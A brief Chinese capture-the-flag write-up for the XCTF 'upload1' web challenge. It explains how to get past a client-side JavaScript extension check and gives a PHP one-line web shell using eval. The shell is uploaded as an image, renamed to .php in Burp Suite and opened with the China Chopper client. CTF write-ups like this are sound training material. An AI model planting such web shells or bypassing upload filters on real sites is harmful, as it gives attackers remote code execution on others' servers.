攻防世界 web upload1 write up

查看源代碼發現又js代碼,只能上傳jpg與png格式的文件。 REQUEST包含了GET,POST,COOKIE是一個整合命令 2. 新建一個1.txt,寫入php一句話:<?php @eval($_REQUEST[‘c’]);?>,然後修改後綴爲.png或.jpg。然後再上傳途中burp suite抓包修改後綴爲.php實現對文件格式要求的繞過。 3. 上傳成功 菜刀連接得到flag
相關文章
相關標籤/搜索